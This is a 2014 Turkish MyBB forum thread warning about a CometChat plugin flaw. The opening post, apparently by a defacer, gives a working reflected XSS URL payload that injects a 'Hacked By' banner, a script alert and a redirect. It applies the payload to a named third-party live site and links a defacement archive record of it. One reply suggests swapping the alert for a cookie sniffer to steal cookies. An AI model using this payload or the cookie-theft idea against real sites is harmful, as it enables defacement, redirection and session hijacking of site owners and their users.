MyBBDepo - Türkiyenin MyBB Deposu Forumuna Hoşgeldiniz
Eğer sitemize yaptığınız ilk ziyaretiniz ise, lütfen öncelikle Forum Kurallarını okuyunuz. Forumumuzda bilgi alışverişinde bulunabilmeniz için Kayıt olmalısınız. Üye olmayanlar forumumuzdan yararlanamazlar.
Eğer zaten kayıtlı kullanıcı iseniz, lütfen kullanıcı adınız ve şifreniz ile, Giriş yapınız. (Sitemize üyelik ücretsizdir).
-NmDahmeT avatar
Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5

Derecelendirme: 5/5 - 1 oy

CometChat Plugin Açığı [HACK Yiyebilirsiniz]


Sponsor Reklam
media venus

Çevrimdışı -NmDahmeT
 Tarih: 01-03-2014, Saat:20:51
(Son Düzenleme: 02-03-2014, Saat:01:38, Düzenleyen: -NmDahmeT.)
#1
Arkadaşlar Cometchat eklentisini mybb kullanıcıları facebook vs. gibi bir görünüme sahip olduğundan ve güzel bir plugin olduğundan tercih ediyor, ama size önermiyorum. Bu eklentide açıklar mevcut.

Örnek bir link:
Kod:
http://cryptr.org/cometchat/plugins/handwrite/index.php?id=%22%3E%3Ch1%3EHacked%20By%20NmDahmeT%20!%3C/h1%3E%3Cimg%20src=http://www.forumtarz.com/images/logo3.png%3E%3Cmeta%20http-equiv=%22refresh%22%20content=%221;URL=http://forumtarz.com/NmDahmeT/%22%3E%3Cscript%3Ealert%28%22ownz%20NmDahmeT%20-%20FT%22%29%3C/script%3Ehttp://cryptr.org/cometchat/plugins/handwrite/index.php?id=%22%3E%3Ch1%3EHacked%20By%20NmDahmeT%20!%3C/h1%3E%3C

Bu adreste olmuyor, lakin zone alınca yönlendirme işliyor.

Zone:
Kod:
http://golgeler.net/view-%3E302959

Site sunumlarında gezerken bir site gördüm oradada var bu eklenti.

Site adresi:
Kod:
http://www.teknology.bl.ee

Açık;
Kod:
http://www.teknology.bl.ee/cometchat/plugins/handwrite/index.php?id=%22%3E%3Ch1%3EHacked%20By%20NmDahmeT%20!%3C/h1%3E%3Cimg%20src=http://www.forumtarz.com/images/logo3.png%3E%3Cmeta%20http-equiv=%22refresh%22%20content=%221;URL=http://forumtarz.com/NmDahmeT/%22%3E%3Cscript%3Ealert%28%22ownz%20NmDahmeT%20-%20FT%22%29%3C/script%3Ehttp://teknology.bl.ee/cometchat/plugins/handwrite/index.php?id=%22%3E%3Ch1%3EHacked%20By%20NmDahmeT%20!%3C/h1%3E%3C

Not;
Kod:
http://www.teknology.bl.ee
sitesi plugini ziyaretçilere gizlemiş üye olup bakarsanız oradada aynı açık var, bu eklentiyi ya kullanmayın yada ziyaretçilere gizleyin.

İyi forumlar !
Cevapla
Bunu Beğenenler:
Sponsor Reklam
sponsor reklam sponsor reklam

Çevrimdışı Smyrna35
 Tarih: 01-03-2014, Saat:21:17
#2
Warez olan bir eklentiden açık olmamasını nasıl bekleyebilirizki ?
Cevapla
Bunu Beğenenler: usameavci , Remzi0068 , Feyz

Çevrimdışı -NmDahmeT
 Tarih: 01-03-2014, Saat:21:33
#3
(01-03-2014, Saat:21:17)Smyrna35 Adlı Kullanıcıdan Alıntı: Warez olan bir eklentiden açık olmamasını nasıl bekleyebilirizki ?

Çok doğru hocam, inşallah kullanmazlar bu ve benzeri pluginleri..
Cevapla
Bunu Beğenenler:

Çevrimdışı SkullzDe2
 Tarih: 01-03-2014, Saat:21:45
#4
Aynen Öyle Fakat Nasıl İndex Atıyorlarki O Açık İle Tedbirimizi Alalım.
Cevapla
Bunu Beğenenler:

Çevrimdışı sp4wn
 Tarih: 01-03-2014, Saat:21:56
#5
Xss vuln. Googlede xss acigi kapatma diye aratirsaniz bulabilirsiniz.
Cevapla
Bunu Beğenenler: Feyz , StudioTNT

Çevrimdışı EmreKarakaya
 Tarih: 01-03-2014, Saat:23:24
#6
Öncellikle başlık yanlış olmuş.Başlık sanki bütün eklentilerden hack yiyebileceğimizi gösteriyor.
Cevapla
Bunu Beğenenler:

Çevrimdışı -NmDahmeT
 Tarih: 02-03-2014, Saat:01:38
#7
başlığı değiştirdim.
Cevapla
Bunu Beğenenler:

Çevrimdışı istanbul123
 Tarih: 02-03-2014, Saat:19:14
#8
Xss alert vericegine bi sniffer çaksan cooikeleri çekersin gölgeler.net'in sahibi arkadaşimiz böyle giderse xss'li siteleri zone almayi yasaklicagiz Açık Ağızlı Gülümseme
Cevapla
Bunu Beğenenler:

 


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  MyBB 1.6.17 - memberlist.php Açığı SiberLeon 14 2,457 25-07-2015, Saat:16:50
Son Yorum: Hashtag
  [MD - 1.6] MyBB - Forum güvenlik ve hack durumunda yapılması gerekenler. 007combatant 7 4,584 21-07-2014, Saat:01:48
Son Yorum: erinkral
  [MCTR - 1.6] MYBB SEARCH ACIĞI ^^ RONDO 2 1,707 07-04-2014, Saat:17:18
Son Yorum: S.G
  [MD - 1.6] MyBB 1-2 Güvenlik açığı. Yardım.. emregs556 11 3,055 14-07-2013, Saat:10:53
Son Yorum: emregs556



Konuyu Okuyanlar: 1 Ziyaretçi